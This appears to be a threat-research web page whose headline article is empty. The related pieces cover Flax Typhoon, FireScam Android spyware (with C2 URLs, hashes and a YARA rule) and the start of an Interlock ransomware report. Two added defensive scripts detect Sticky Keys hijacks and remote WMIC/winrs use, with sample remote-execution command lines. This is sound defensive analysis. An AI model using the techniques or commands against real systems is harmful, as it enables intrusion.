MaaS

Fileless Malware


RevC2, More_eggs Lite & PSLoramyra: Insights into Advanced Fileless Malware

Explore detailed analysis of advanced fileless malware RevC2, More_eggs Lite, and PSLoramyra. Understand their tactics, IOCs, and protection strategies.

06-Dec-2024
24 min read

No content available.

Related Articles


APT

Botnet

Explore how China's Flax Typhoon group targets global critical infrastructure, u...

In recent years, the **cyber espionage landscape** has been drastically shaped by state-sponsored actors with far-reaching geopolitical and economic motives. One of the most infamous names in this space remains **Flax Typhoon**, a Chinese cyber espionage group (also known as **Ethereal Panda**), which has been actively targeting critical infrastructure, government agencies, universities, and corporations in Taiwan, the U.S., and other parts of the world. This **[Threat Research](https://www.secureblink.com/threat-research)** provides a comprehensive [analysis](https://attack.mitre.org/techniques/T1190) of the **Flax Typhoon** group: their methods, targets, tools, and implications for global cybersecurity. The research also explores the interconnections between the group and **Chinese intelligence services**, detailing the **botnet infrastructure**, **tactics**, **tools**, and **techniques** that have enabled them to maintain long-term access to vulnerable networks.

## 1. **Introduction to Flax Typhoon: A Chinese State-Sponsored Threat**

**Flax Typhoon** is part of a broader wave of **China-backed cyber activities** aimed at **espionage**, **data theft**, and **disruption** of critical infrastructure. The group has been tracked by **Microsoft**, **CrowdStrike**, and other cybersecurity agencies under the name **Flax Typhoon**, and it shares tactics, techniques, and infrastructure with other Chinese APTs (Advanced Persistent Threats), such as **[Volt Typhoon](https://www.secureblink.com/threat-research/volt-typhoon-chinese-state-sponsored-actor-targeting-critical-infrastructure)** and **[Salt Typhoon](https://www.secureblink.com/cyber-security-news/t-mobile-thwarts-chinese-hackers-salt-typhoon-telecom-breach-stopped)**. Flax Typhoon's activities primarily target **Taiwan**, but its reach spans **North America**, **Southeast Asia**, and **Europe**, reflecting China's growing cyber capabilities and strategic ambitions.

![Figure-1.-Flax-Typhoon-attack-chain-diagram-2048x672.webp](https://sb-cms.s3.ap-south-1.amazonaws.com/Figure_1_Flax_Typhoon_attack_chain_diagram_2048x672_9adfba327b.webp)

**Flax Typhoon Attack Flow**

The group has been active since at least **mid-2021**, and its operations are marked by a deliberate and sophisticated approach, relying on **[living-off-the-land](https://www.microsoft.com/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/) (LotL)** techniques, which make detection more challenging for traditional defense systems. These techniques enable the group to maintain long-term access to victim networks, allowing them to collect sensitive information over extended periods.

---

## 2. **Flax Typhoon's Key Targets and Infrastructure**

### **2.1. Targeted Organizations**

Flax Typhoon's focus has been primarily on **[Taiwan](https://www.crowdstrike.com/adversaries/ethereal-panda/)**, a key geopolitical flashpoint for China. The group's primary targets in Taiwan have included:

- **Government agencies**
- **Educational institutions**
- **Critical manufacturing**
- **Information technology (IT) organizations**

Beyond Taiwan, **Flax Typhoon** has also targeted organizations across **Southeast Asia**, **North America**, and **Europe**, reflecting the global scope of its operations. Some of the most notable sectors under attack include:

- **Telecommunications**
- **Military** and **Defense sectors**
- **Media organizations**

These sectors are all critical for national security, making them highly valuable for espionage campaigns aimed at gathering **intelligence**, **sensitive data**, and **trade secrets**.

### **2.2. Botnet Infrastructure and Control**

Flax Typhoon's most notable infrastructure is its **botnet**, which was **dismantled by the FBI** in **September 2023**. The botnet comprised over **260,000 devices**, including **IoT devices**, **cameras**, **routers**, and **storage devices**, spanning multiple continents. This botnet was used to **conceal Flax Typhoon's activities** and maintain access to compromised networks.

- **Device Control**: Flax Typhoon leveraged **SoftEther VPN** software and **China Chopper web shells** to maintain persistence and **remote access** to compromised systems.
- **Infiltration Methods**: The botnet operated using **compromised routers** and other internet-connected devices, which are often difficult to monitor, providing the group with an untraceable method of **data exfiltration**.

Flax Typhoon's approach exemplifies how attackers are increasingly relying on **IoT devices** as a gateway to infiltrate larger networks, making detection harder while increasing the potential impact.

---

## 3. **Tactics, Techniques, and Procedures (TTPs)**

### **3.1. Living-Off-The-Land (LotL) Techniques**

One of the defining characteristics of **Flax Typhoon's** operations is the use of **LotL** techniques. By exploiting **built-in tools** in the operating system and widely available software, Flax Typhoon minimizes the need for custom malware, making it harder to detect. The primary tactics observed include:

- **Remote Desktop Protocol (RDP)**: RDP is used for establishing initial access and maintaining control over compromised systems.
- **VPN Bridging**: The group uses VPN software, such as **SoftEther**, to create secure channels to external infrastructure.
- **Credential Harvesting**: Tools like **Mimikatz** are used to dump **password hashes** and escalate privileges within compromised networks.

This **low-and-slow** approach enables the group to maintain **long-term access** while staying under the radar of security teams.

### **3.2. Post-Exploitation and Lateral Movement**

After gaining initial access, Flax Typhoon uses several techniques to escalate privileges and move laterally within the compromised network:

- **Sticky Keys**: The group modifies **Sticky Keys** behavior to launch **Task Manager**, which provides **local system privileges**.
- **WinRM and WMIC**: These **LOLBins** (Living-off-the-Land Binaries) are used for **lateral movement** across the compromised network, facilitating deeper access to sensitive systems.
- **Web Shells**: **China Chopper** and other web shells are deployed to maintain access and facilitate post-exploitation activities.

Flax Typhoon's ability to **maneuver laterally** within the network without triggering alerts is a clear indicator of their **sophisticated techniques** and **adherence to stealth**.

---

## 4. **Flax Typhoon's Global Impact & Strategic Objectives**

### **4.1. Strategic Espionage**

Flax Typhoon's primary mission is **espionage**. While their tactics and infrastructure have been linked to traditional **cyber-espionage** activities, their **long-term access** to target networks suggests the group is laying the groundwork for future **cyber disruptions** or **destructive attacks** if the geopolitical situation escalates, particularly concerning Taiwan.

- **Targeting Critical Infrastructure**: By maintaining access to critical infrastructure sectors, Flax Typhoon is positioning itself to potentially **disrupt services** in times of crisis, leveraging its foothold for maximum impact.
- **Data Exfiltration**: Although **Flax Typhoon** has not yet weaponized its access to conduct large-scale data exfiltration, the prolonged nature of its infiltrations indicates that espionage and intelligence-gathering remain top priorities.

### **4.2. Economic and Geopolitical Implications**

The continued **cyber espionage** activities by **China-backed hackers** have profound economic and geopolitical consequences:

- **Intellectual Property Theft**: The compromise of **technology companies** and **research institutions** allows China to **steal intellectual property** and gain access to sensitive trade secrets.
- **Global Trade Disruption**: In a worst-case scenario, if China decides to leverage its **cyber capabilities** in a crisis, it could disrupt global supply chains and trade.

As China continues to expand its **cyber capabilities**, the threat to critical infrastructure and private-sector organizations becomes increasingly significant.

---

## 5. **The U.S. Government's Response and Ongoing Challenges**

### **5.1. Sanctions and Disruptive Measures**

In response to Flax Typhoon's activities, the **U.S. government** has sanctioned **Integrity Technology Group**, a **Beijing-based cybersecurity company**, for its role in facilitating these cyberattacks. The **Treasury Department** imposed **sanctions** on the company, freezing its assets and restricting financial interactions with **U.S. entities**.

Despite these measures, the **persistent nature** of these **state-backed cyber operations** suggests that sanctions alone may not be sufficient to counter the growing threat. The **FBI** and **NSA** have taken actions, such as **botnet takedowns**, but Flax Typhoon's **adaptive tactics** continue to present challenges for **cybersecurity defense teams**.

### **5.2. International Cooperation and Private Sector Collaboration**

The growing threat of **Flax Typhoon** underscores the need for stronger **international cooperation** and **private-public sector collaboration** to detect and disrupt cyber-espionage activities:

- **Real-time Detection**: Governments and private organizations must strengthen their **real-time detection** capabilities to identify and neutralize such threats quickly.
- **Cyber Hygiene**: Ensuring **basic cybersecurity hygiene**, such as **patching vulnerabilities**, implementing **strong authentication protocols**, and conducting **regular audits**, is critical in defending against these sophisticated, **low-profile** attacks.

---

## 6. **Conclusion**

Flax Typhoon represents a **highly sophisticated** and **persistent** threat that continues to evolve its tactics to maintain **long-term access** to targeted networks. The group's reliance on **living-off-the-land techniques** and **minimal malware** makes it a difficult adversary for traditional defense systems. As **China-backed cyber espionage** continues to escalate, the **global cybersecurity community** must adapt and strengthen its defenses, focusing on **collaboration**, **detection**, and **prevention**.

The **sanctions** against **Integrity Technology Group** highlight the growing need to **hold entities accountable** that enable **state-sponsored cyber-espionage**. However, the ongoing **cybersecurity arms race** suggests that **Flax Typhoon** and similar groups will continue to evolve, and organizations must remain vigilant against the growing threat of **nation-state cyber operations**.
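The Sticky Keys modification and the WinRM/WMIC lateral movement described in section 3.2 both leave artefacts a defender can check for. The script below is an added example written for this edit, not part of the original research or of any vendor's tooling. It assumes the Sticky Keys change is made through an Image File Execution Options (IFEO) `Debugger` value on an accessibility binary (one common way to do it; that mechanism is an assumption here, not a detail taken from the research), and the registry values and process-creation records it runs over are constructed sample data rather than telemetry from a Flax Typhoon case.

```python
"""Detection triage for two living-off-the-land behaviours (added example).

Checks, from defender-side artefacts:
  1. an IFEO "Debugger" value set on a Windows accessibility binary such as
     sethc.exe (one common way the Sticky Keys behaviour is redirected;
     an assumption for this example, not taken from the research above);
  2. process-creation records where WMIC, winrs or PowerShell remoting is
     pointed at another host (lateral movement via LOLBins).
All registry values and process records below are constructed samples.
"""
from dataclasses import dataclass
import re

IFEO_PREFIX = ("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\"
               "Image File Execution Options\\")
# Accessibility helpers that can be launched from the logon screen.
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}


@dataclass
class RegistryValue:
    key: str
    name: str
    data: str


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str
    command_line: str


def ifeo_hijacks(values):
    """Return (binary, debugger) pairs for accessibility tools with an IFEO Debugger set."""
    hits = []
    for v in values:
        if not v.key.lower().startswith(IFEO_PREFIX.lower()):
            continue
        binary = v.key[len(IFEO_PREFIX):].split("\\")[0].lower()
        if v.name.lower() == "debugger" and binary in ACCESSIBILITY_BINARIES:
            hits.append((binary, v.data))
    return hits


# Command-line shapes that show the LOLBin is targeting a remote host.
REMOTE_PATTERNS = {
    "wmic.exe": re.compile(r"/node:", re.I),
    "winrs.exe": re.compile(r"-r:", re.I),
    "powershell.exe": re.compile(
        r"\b(Invoke-Command|Enter-PSSession|New-PSSession)\b.*-ComputerName", re.I),
}


def remote_lolbin_use(events):
    """Return (host, user, image) for process events that reach out to other hosts."""
    hits = []
    for e in events:
        image = e.image.rsplit("\\", 1)[-1].lower()
        pattern = REMOTE_PATTERNS.get(image)
        if pattern and pattern.search(e.command_line):
            hits.append((e.host, e.user, image))
    return hits


# Constructed sample data: one IFEO hijack of sethc.exe among ordinary values,
# and two remote LOLBin invocations among ordinary local ones.
SAMPLE_REGISTRY = [
    RegistryValue(IFEO_PREFIX + "sethc.exe", "Debugger", "C:\\Windows\\System32\\taskmgr.exe"),
    RegistryValue(IFEO_PREFIX + "notepad.exe", "Debugger", "C:\\Tools\\devdebugger.exe"),
    RegistryValue(IFEO_PREFIX + "utilman.exe", "UseFilter", "1"),
]
SAMPLE_EVENTS = [
    ProcessEvent("WS-07", "CORP\\jdoe", "C:\\Windows\\System32\\wbem\\WMIC.exe",
                 'wmic /node:"FS-01" process call create "hostname"'),
    ProcessEvent("WS-07", "CORP\\jdoe", "C:\\Windows\\System32\\wbem\\WMIC.exe",
                 "wmic os get caption"),
    ProcessEvent("WS-12", "CORP\\svc_backup", "C:\\Windows\\System32\\winrs.exe",
                 "winrs -r:DC-01 hostname"),
    ProcessEvent("WS-12", "CORP\\svc_backup",
                 "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                 "powershell Get-Process"),
]

if __name__ == "__main__":
    for binary, dbg in ifeo_hijacks(SAMPLE_REGISTRY):
        print(f"IFEO hijack: {binary} -> {dbg}")
    for host, user, image in remote_lolbin_use(SAMPLE_EVENTS):
        print(f"remote LOLBin use on {host} by {user}: {image}")
```

On a real estate the registry values would come from an export of the IFEO key on each host and the process events from Sysmon or Security event 4688 with command-line logging enabled; the `notepad.exe` debugger entry in the sample is there to show that a `Debugger` value is only interesting when it sits on a binary reachable from the logon screen.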

28-Jan-2025
1 min read

Spyware

Infostealer

Explore an in-depth technical analysis of FireScam—a stealthy Android malware po...

**FireScam** is a recently identified Android malware that masquerades as a "Telegram Premium" application. Its distribution method leverages GitHub.io-based phishing sites impersonating the legitimate Russian **RuStore** app store, thereby deceiving unwary users into installing a bogus APK. With its **multifaceted spyware and information-stealing capabilities**, FireScam represents a crucial case study in modern mobile malware, demonstrating innovative evasion techniques, comprehensive data exfiltration processes, and persistent surveillance functionality.

This Threatfeed provides a **deeply technical** and **context-driven** analysis of FireScam, illustrating how it operates, spreads, and maintains control over compromised devices.

## **2. Threat Distribution and Infection Chain**

### **2.1 Phishing Website (GitHub.io)**

- **URL Impersonation**: FireScam is distributed through a GitHub.io-hosted website impersonating **RuStore** (a popular Russian app store).
- **Site Address**:

  ```
  https://rustore-apk.github[.]io/telegram_premium/
  ```

- **User Deception**: The phishing site closely mirrors official app store styling, luring victims into downloading a malicious file named **GetAppsRu.apk**, which appears legitimate but is in fact a **dropper**.

### **2.2 Dropper APK: GetAppsRu.apk**

- **File Name**: `GetAppsRu.apk`
- **Hashes**:
  - MD5: `5d21c52e6ea7769be45f10e82b973b1e`
  - SHA-256: `b041ff57c477947dacd73036bf0dee7a0d6221275368af8b6dbbd5c1ab4e981b`
- **Technical Properties**:
  - Protected using **DexGuard**, which obfuscates classes, methods, strings, and control flow.
  - Requests extensive permissions, including `REQUEST_INSTALL_PACKAGES`, enabling it to install additional APKs without explicit user interaction.
  - Disguised with the package name `ru.store.installer` to appear like a legitimate Russian application manager.

### **2.3 Main Payload: Telegram Premium.apk**

- **File Name**: `Telegram Premium.apk`
- **Hashes**:
  - MD5: `cae5a13c0b06de52d8379f4c61aece9c`
  - SHA-256: `12305b2cacde34898f02bed0b12f580aff46531aa4ef28ae29b1bf164259e7d1`
- **Packaging Details**:
  - Significantly smaller (around 3 MB).
  - Protected with **NP Manager** (offers encryption and anti-analysis functionalities).
  - Installs under the package name `ru.get.app`, masquerading as "Telegram Premium."

> **Infection Flow**
> 1. **User visits** the phishing website.
> 2. **User downloads** the dropper (`GetAppsRu.apk`).
> 3. **Dropper launches** on the victim's device and executes an "Install" function.
> 4. **Main payload** (`Telegram Premium.apk`) is silently installed.
> 5. **Malware sets up** monitoring, exfiltration, and anti-analysis routines.

---

## **3. Technical Analysis of FireScam**

### **3.1 Anti-Analysis and Evasion Mechanisms**

1. **Obfuscation**
   - **DexGuard** & **NP Manager** transform class/method names into random or meaningless labels.
   - Inherits from **empty classes** to confuse static analysis and hinder method-tracing.
2. **Sandbox Detection**
   - **Checks runtime process** name for anomalies (typical of emulators like `test` or `sandbox`).
   - **Profiles device** (build details, manufacturer, installed apps) to confirm a real device environment.
3. **Runtime Behavior Control**
   - **Conditional Execution**: The malware modifies its behavior if it detects an analysis environment, possibly refraining from executing malicious routines to avoid detection.

### **3.2 Permissions and Potential Abuse**

- **`REQUEST_DELETE_PACKAGES`** & **`REQUEST_INSTALL_PACKAGES`**
  - Permits removal or installation of other applications silently, aiding further compromise or removing security tools.
- **`WRITE_EXTERNAL_STORAGE`** & **`READ_EXTERNAL_STORAGE`**
  - Enables the app to read or write files to the SD card, potentially exfiltrating data or saving malicious components.
- **`QUERY_ALL_PACKAGES`**
  - Allows listing all installed apps for reconnaissance and potential exploitation paths.
- **`ENFORCE_UPDATE_OWNERSHIP`**
  - Declares itself as the "update owner," preventing legitimate sources from installing genuine updates over it.

### **3.3 Core Functional Modules**

FireScam focuses on **monitoring**, **data exfiltration**, and **persistent communication**:

1. **Firebase Cloud Messaging (FCM)**
   - Registers for push notifications through **MessagingService**.
   - Can receive commands to download further payloads or exfiltrate specific data sets.
2. **Dynamic Broadcast Receivers**
   - **Restricted Access**: Only apps signed with the same certificate can communicate, enabling a private channel with other malicious modules.
3. **Firebase Realtime Database (C2 Channel)**
   - **Data Endpoint**:

     ```
     https://androidscamru-default-rtdb.firebaseio.com
     ```

   - **WebSocket Upgrades**: Uses `Upgrade: websocket` for persistent real-time data exchange, allowing seamless command execution and data exfiltration.

---

## **4. Surveillance and Data Exfiltration Workflows**

### **4.1 System and Device Profiling**

Upon installation, FireScam executes:

1. **Initial Device Info Collection**
   - Device model, manufacturer, OS version, locale.
   - Sent to Firebase with "online" status, letting attackers verify newly infected devices.
2. **Continuous Environment Monitoring**
   - Tracks changes in device configuration.
   - Logs presence of antivirus or known security apps.

### **4.2 Notification Listener**

- **`NotifyListener`** Service
  - Implements `NotificationListenerService` to intercept notifications from **all** apps (e.g., WhatsApp, Telegram, Viber, banking apps).
  - Filters out "silent" or "ongoing" notifications; captures "alerting" or "conversation" types.
  - Exfiltrates the entire notification payload (sender, message snippet, etc.).

> **Why This Matters**
> Attackers can glean personal communication, 2FA codes, and system warnings. This broad-level interception is a hallmark of advanced spyware.

### **4.3 Messages and USSD Monitoring**

- **SMS Content Extraction**
  - Observes the **Messages** application to read inbound SMS.
  - Tags logs with `appName: Messages` and uploads them to Firebase.
- **USSD Responses**
  - Monitors `TelephonyManager.UssdResponseCallback` to track USSD session outcomes (used for balance checks, mobile money transfers).
  - Logs success or failure codes, possibly capturing **sensitive financial** data.

### **4.4 Clipboard and Screen Activity**

- **Clipboard Logging**
  - Hooks into `ContentInfoCompat` to capture:
    - **Autofill** fields.
    - **Clipboard** data (copied passwords, account numbers, etc.).
    - **Shared text/URI** from other apps.
- **Screen State Monitoring**
  - Listens for `SCREEN_ON` and `SCREEN_OFF` broadcasts.
  - Logs active durations to ascertain user engagement.
  - Potentially uses these timings to intensify data collection when the user is active.

### **4.5 E-commerce Transaction Tracking**

- **Purchase & Refund Events**
  - Analyzes event types **`ecommerce_purchase`**, **`purchase`**, **`refund`**.
  - Flags these for special logging and exfiltration, possibly targeting shopping or financial apps.

### **4.6 Potential to Download Additional Payloads**

- **Image Download & Decoding**
  - The malware attempts to retrieve images from remote URLs.
  - Could embed further malicious code (e.g., steganography), facilitating a secondary infection stage.

---

## **5. Behavioral Flow of FireScam**

1. **Installation & Initial Launch**
   - Victim opens `GetAppsRu.apk`, which installs the **fake Telegram Premium**.
   - On first run, FireScam requests various permissions.
2. **User Login Spoofing**
   - Presents a **WebView** mimicking the official `web.telegram.org` interface.
   - Collects any credentials entered, storing or sending them to Firebase.
3. **Background Surveillance**
   - Registers with Firebase for push notifications.
   - Begins capturing notifications, SMS, USSD, etc.
4. **Data Transmission**
   - Bundles collected data and securely sends it over a **TLS/WebSocket** session.
   - The C2 server acknowledges and may issue new commands.
5. **Potential Secondary Payload Execution**
   - If commanded, FireScam silently downloads additional components or updates itself, maintaining **long-term persistence**.

---

## **6. Indicators of Compromise (IOCs)**

| **S/N** | **Indicator** | **Type** | **Context** |
|:------:|:---------------------------------------------------------------------------------------------|:--------:|:------------------------------|
| 1 | `5d21c52e6ea7769be45f10e82b973b1e` | File | Dropper (GetAppsRu.apk) |
| 2 | `b041ff57c477947dacd73036bf0dee7a0d6221275368af8b6dbbd5c1ab4e981b` | File | Dropper (GetAppsRu.apk) |
| 3 | `cae5a13c0b06de52d8379f4c61aece9c` | File | Telegram Premium.apk |
| 4 | `12305b2cacde34898f02bed0b12f580aff46531aa4ef28ae29b1bf164259e7d1` | File | Telegram Premium.apk |
| 5 | `https://s-usc1b-nss-2100[.]firebaseio[.]com/.ws?ns=androidscamru-default-rtdb&v=5&ls=*` | URL | C2 – Exfiltration |
| 6 | `s-usc1b-nss-2100[.]firebaseio[.]com` | Domain | C2 – Exfiltration |
| 7 | `https[:]//androidscamru-default-rtdb[.]firebaseio[.]com` | URL | C2 Endpoint Database |
| 8 | `https[:]//rustore-apk[.]github[.]io/telegram_premium` | URL | Phishing Website |

---

## **7. MITRE ATT&CK Framework Mapping**

| **Tactic** | **Technique** |
|---------------------------------|----------------------------------------------------------|
| **Initial Access (TA0027)** | T1660: Phishing |
| **Persistence (TA0028)** | T1624.001: Broadcast Receivers |
| **Privilege Escalation (TA0029)** | T1626.001: Device Administrator Permissions |
| **Defense Evasion (TA0030)** | T1628: Hide Artifacts <br>T1406: Obfuscated Files or Info <br>T1633: Virtualization/Sandbox Evasion |
| **Credential Access (TA0031)** | T1517: Access Notifications <br>T1414: Clipboard Data |
| **Discovery (TA0032)** | T1424: Process Discovery <br>T1426: System Info Discovery |
| **Collection (TA0035)** | T1517: Access Notifications <br>T1414: Clipboard Data <br>T1513: Screen Capture |
| **Command and Control (TA0037)** | T1437.001: Web Protocols <br>T1521: Encrypted Channel |
| **Exfiltration (TA0036)** | T1646: Exfiltration Over C2 Channel |

---

## **8. YARA Rule for FireScam Detection**

```yara
rule FireScam_Malware_Indicators {
    meta:
        description = "Detects FireScam malware based on file hashes, URLs, and network indicators"
        author = "Cyfirma Research"
        last_modified = "2024-12-25"
    strings:
        // MD5 Hashes
        $md5_1 = "5d21c52e6ea7769be45f10e82b973b1e" ascii
        $md5_2 = "cae5a13c0b06de52d8379f4c61aece9c" ascii
        // SHA256 Hashes
        $sha256_1 = "b041ff57c477947dacd73036bf0dee7a0d6221275368af8b6dbbd5c1ab4e981b" ascii
        $sha256_2 = "12305b2cacde34898f02bed0b12f580aff46531aa4ef28ae29b1bf164259e7d1" ascii
        // URLs
        $url_1 = "https://androidscamru-default-rtdb.firebaseio.com" ascii
        $url_2 = "https://s-usc1b-nss-2100.firebaseio.com/.ws?ns=androidscamru-default-rtdb&v=5&ls=" ascii
        $url_3 = "https://rustore-apk.github.io/telegram_premium/" ascii
    condition:
        // Match on either hash or URL indicators
        ($md5_1 or $md5_2 or $sha256_1 or $sha256_2) or ($url_1 or $url_2 or $url_3)
}
```

---

## **9. Defensive Recommendations**

1. **Endpoint Security and Monitoring**
   - Deploy **antimalware** solutions on mobile endpoints.
   - Implement **host-based intrusion detection** (HIDS/HIPS).
   - Continuously monitor system logs for unusual processes or network requests.
2. **Network-Level Controls**
   - **NIDS/NIPS**: Inspect traffic for suspicious patterns or known malicious signatures.
   - **Web Application Firewalls (WAFs)**: Block access to malicious GitHub.io pages and Firebase endpoints if detected malicious.
3. **Application Whitelisting**
   - Restrict installations to apps from **official app stores**.
   - Use **enterprise mobile management** (EMM) solutions to limit users' ability to install unknown APKs.
4. **Patching and Vulnerability Assessments**
   - Regularly update the OS and all installed applications.
   - Conduct **penetration tests** to uncover misconfigurations or weak security policies.
5. **User Awareness and Training**
   - Educate users about **phishing tactics** and suspicious links.
   - Encourage verification of official app stores and developers.
   - Foster a security-first culture to reduce the success rate of social engineering.
6. **Incident Response Preparedness**
   - Develop an **IR plan** that outlines isolation measures for compromised devices.
   - Maintain an up-to-date **threat intelligence** feed to proactively block known malicious indicators.

---

FireScam exemplifies a **highly advanced** Android malware strain adept at **bypassing security barriers**, conducting **real-time surveillance**, and **stealing sensitive user data** through covert channels. Its dual distribution approach, a **phishing website** plus a **dropper APK**, shows the **evolving sophistication** of mobile threat actors and underscores the **need for layered security**. By diligently applying **robust endpoint protections**, **network filtering**, **user education**, and **timely updates**, individuals and organizations can **thwart** FireScam's infiltration and mitigate potential harm.

> **Final Takeaway**: As Android malware matures, blending social engineering with advanced evasion, **proactive security measures** and **continuous monitoring** become non-negotiable. FireScam's cunning approach, disguised as a trusted app and enhanced by legitimate cloud services, demonstrates how crucial it is to remain **vigilant** and **updated** on emerging threats in the mobile landscape.

---

### **Additional Resources**

- **Mobile Security Best Practices**: [Android Security Center](https://source.android.com/security)
- **DexGuard and NP Manager**: Official vendor documentation on obfuscation techniques
- **Firebase Security Rules**: [Firebase Docs](https://firebase.google.com/docs/rules)

> **Disclaimer**: This technical writeup is intended solely for **educational** and **defensive** security purposes. All research is based on publicly available or ethically sourced information. Always comply with **legal** and **ethical** guidelines when analysing malware.
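The permission set in section 3.2 and the `NotificationListenerService` in section 4.2 are visible in an APK's manifest before the app is ever run, which makes them a cheap triage signal for an EMM team or an analyst looking at a sideloaded package. The script below is an added example written for this edit, not part of the original analysis or of any vendor product; both manifests it parses are constructed samples (the package names and service names are placeholders), not FireScam's real manifest, and the "high/review/low" thresholds are an arbitrary choice for illustration.

```python
"""Android manifest permission triage (added example, not from the writeup).

Flags the permission profile described in the FireScam analysis: silent
install/delete of packages, full package enumeration, update-ownership
enforcement, shared-storage access, and a service bound with
BIND_NOTIFICATION_LISTENER_SERVICE (a NotificationListenerService).
Both manifests below are constructed samples with placeholder names.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A_NAME = "{%s}name" % ANDROID_NS
A_PERMISSION = "{%s}permission" % ANDROID_NS

# Permissions called out in the analysis, with the abuse each one enables.
WATCHED_PERMISSIONS = {
    "android.permission.REQUEST_INSTALL_PACKAGES": "can install further APKs (dropper behaviour)",
    "android.permission.REQUEST_DELETE_PACKAGES": "can remove other apps, e.g. security tools",
    "android.permission.QUERY_ALL_PACKAGES": "enumerates every installed app",
    "android.permission.ENFORCE_UPDATE_OWNERSHIP": "blocks legitimate stores from updating over it",
    "android.permission.READ_EXTERNAL_STORAGE": "reads shared storage",
    "android.permission.WRITE_EXTERNAL_STORAGE": "writes shared storage",
}
NOTIFICATION_LISTENER = "android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"


def triage_manifest(manifest_xml):
    """Return package name, matched permissions, listener services and a coarse risk label."""
    root = ET.fromstring(manifest_xml)
    requested = {el.get(A_NAME) for el in root.iter("uses-permission")}
    findings = {p: why for p, why in WATCHED_PERMISSIONS.items() if p in requested}
    # A service guarded by BIND_NOTIFICATION_LISTENER_SERVICE is what lets an
    # app read every other app's notifications once the user grants access.
    listeners = [svc.get(A_NAME) for svc in root.iter("service")
                 if svc.get(A_PERMISSION) == NOTIFICATION_LISTENER]
    if listeners or len(findings) >= 3:   # arbitrary thresholds for illustration
        risk = "high"
    elif findings:
        risk = "review"
    else:
        risk = "low"
    return {"package": root.get("package"), "findings": findings,
            "notification_listeners": listeners, "risk": risk}


# Constructed sample: the permission/service combination the analysis describes.
SUSPICIOUS_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="sample.installer.example">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>
  <uses-permission android:name="android.permission.QUERY_ALL_PACKAGES"/>
  <uses-permission android:name="android.permission.ENFORCE_UPDATE_OWNERSHIP"/>
  <application android:label="Sample">
    <service android:name=".NotifyListener"
             android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
      <intent-filter>
        <action android:name="android.service.notification.NotificationListenerService"/>
      </intent-filter>
    </service>
  </application>
</manifest>"""

# Constructed sample: an ordinary app with a single network permission.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="sample.notes.example">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <service android:name=".SyncService"/>
  </application>
</manifest>"""

if __name__ == "__main__":
    for manifest in (SUSPICIOUS_MANIFEST, BENIGN_MANIFEST):
        result = triage_manifest(manifest)
        print(result["package"], result["risk"],
              sorted(result["findings"]), result["notification_listeners"])
```

For a packed APK the manifest is stored in binary XML; decode it first (for example with `apktool` or `aapt dump xmltree`) and feed the resulting text to `triage_manifest`. A listener service alone does not make an app malicious (accessibility and wearable apps use it legitimately), which is why the result reports the matched permissions and services separately rather than a single verdict.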

09-Jan-2025
1 min read

Encryptor

Interlock ransomware is a cross-platform threat targeting critical infrastructur...

The **Interlock ransomware** is a rapidly emerging threat that has made a significant impact on industries across **healthcare, technology, government, and manufacturing** sectors. For example, notable incidents have impacted healthcare organizations like Wayne County's government services, technology firms across Europe, and various manufacturing facilities, causing significant disruptions and financial losses. First observed in **September 2024**, Interlock differentiates itself by specifically targeting **Windows, Linux, and FreeBSD systems**, utilizing **big-game hunting** and **double-extortion** tactics. The ransomware group has been involved in campaigns affecting both **U.S. and European infrastructure**, using sophisticated techniques to compromise systems, encrypt data, and hold it hostage while threatening to release sensitive information. This [Threat Research](https://www.secureblink.com/threat-research) amalgamates key findings from our analysis, providing a exaustive and in-depth analysis of Interlock’s methods, tactics, and impacts. ### Key Characteristics of Interlock Ransomware #### 1. **Initial Appearance and Target Platforms** Interlock ransomware was first seen in **[September 2024](https://www.secureblink.com/cyber-security-news/interlock-ransomware-puts-free-bsd-servers-in-critical-danger-worldwide)**, making an immediate mark by targeting **FreeBSD servers**, an unusual but valuable target. Unlike traditional ransomware families that mainly attack **Windows** systems, Interlock's expansion into **Linux** and **FreeBSD** reveals a new phase in the evolution of cross-platform ransomware. FreeBSD, known for its stability and widespread use in **critical infrastructure**, represents a high-value target. By compromising such systems, Interlock maximizes its disruptive potential across industries that require near-continuous uptime and high performance. #### 2. 
**Tactics, Techniques, and Procedures (TTPs)** Interlock ransomware employs a multi-component attack chain with a strong focus on both **infiltration** and **data exfiltration**. The tools used throughout the attack include: - **Remote Access Tools (RATs)**: Interlock uses a **SystemBC RAT**, disguised as a **fake browser updater**, to establish initial access. This RAT acts as a delivery mechanism, automatically executing a **PowerShell script** that downloads and runs additional malicious payloads (Arete). This approach highlights Interlock's use of socially engineered initial compromise, making it harder for traditional security measures to detect. - **Credential Stealer and Keylogger**: Once the RAT is established, additional tools such as a **credential stealer** and a **keylogger** are deployed to gather login information from compromised systems. The credential stealer, compiled in **Golang**, extracts data like **login credentials**, **browser history**, and **bookmarks**, and the keylogger records keystrokes to further compromise system security (Talos, Arete). Breaking these steps down into distinct attack phases improves the readability and clarity of how the attacker moves through the victim’s systems. - **Lateral Movement**: Interlock uses **Remote Desktop Protocol (RDP)**, **AnyDesk**, **PuTTY**, and **LogMeIn** for lateral movement, gaining deeper access into the network. These tools allow the attacker to access both **Windows** and **Linux** systems, showcasing the ransomware's versatility in compromising multi-platform environments (Talos). To improve the flow, consider simplifying this section to focus on how these tools collectively aid in lateral movement. - **Data Exfiltration**: Interlock employs **Azure Storage Explorer** and the **AZCopy** utility to exfiltrate data to an attacker-controlled Azure storage blob. 
